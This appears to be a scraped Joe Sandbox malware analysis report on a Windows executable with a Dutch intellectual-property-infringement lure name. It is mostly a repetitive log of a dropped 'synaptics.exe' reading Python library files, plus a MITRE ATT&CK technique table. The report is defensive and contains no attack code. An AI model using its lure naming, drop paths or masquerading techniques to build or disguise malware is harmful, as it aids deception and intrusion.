Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\tokenize.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\tokenize.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\tokenize.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\tokenize.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\tokenize.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\tokenize.cpython-310.pyc.30815872 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\token.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\token.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\token.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\token.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\token.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\token.cpython-310.pyc.30815776 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\weakref.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\weakref.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\weakref.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\weakref.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\weakref.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\weakref.cpython-310.pyc.30816544 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\_weakrefset.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\_weakrefset.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\_weakrefset.cpython-310.pyc.30817216 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\collections VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\collections VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\collections VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\collections\abc.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\collections\abc.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\collections\abc.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\collections\abc.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\collections\abc.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\collections\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\collections\__pycache__\abc.cpython-310.pyc.30736272 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\string.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\string.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\string.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\string.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\string.cpython-310.pyc.30817216 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\threading.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\threading.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\threading.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\threading.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\threading.cpython-310.pyc.30817792 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\typing.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\typing.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\typing.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\typing.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\typing.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\typing.cpython-310.pyc.30818176 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\contextlib.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\contextlib.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\contextlib.cpython-310.pyc.31043616 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\urllib3 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\urllib3 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\urllib3 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\urllib3\exceptions.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\urllib3\exceptions.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\urllib3\exceptions.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\urllib3\exceptions.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\urllib3\exceptions.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\urllib3\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\urllib3\__pycache__\exceptions.cpython-310.pyc.30499328 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\socket.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\socket.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\socket.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\socket.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\socket.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\socket.cpython-310.pyc.31043712 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs\_socket.pyd VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\selectors.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\selectors.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\selectors.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\selectors.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\selectors.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\selectors.cpython-310.pyc.31046784 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs\select.pyd VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\email\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\email\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\email\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\email\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\email\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\email VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\email\__pycache__\__init__.cpython-310.pyc.29200272 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\email VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\email VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\email VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\email\errors.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\email\errors.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\email\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\email\__pycache__\errors.cpython-310.pyc.31047264 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\http\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\http\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\http\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\http\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\http VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\http\__pycache__\__init__.cpython-310.pyc.31182320 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\http VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\http VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\http VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\http\client.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\http\client.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\http\client.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\http\client.py VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\CascadiaMono.ttf VolumeInformation

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	Scheduled Task/Job	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	2 Modify Registry	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Search Order Hijacking	1 DLL Search Order Hijacking	11 Process Injection	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	13 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Search Order Hijacking	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Privilege Escalation

Compliance

Spreading

Networking

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe